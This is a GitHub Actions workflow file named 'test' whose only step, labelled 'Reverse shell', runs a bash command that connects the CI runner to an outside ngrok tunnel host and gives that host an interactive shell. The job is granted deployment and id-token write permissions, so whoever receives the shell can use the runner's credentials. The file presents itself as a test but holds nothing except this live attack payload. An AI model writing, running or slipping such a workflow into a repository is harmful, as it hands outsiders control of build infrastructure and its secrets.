name: test

on: workflow_dispatch

permissions:
  contents: read
  deployments: write
  id-token: write

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Reverse shell
        run: |
          bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/10699 0>&1
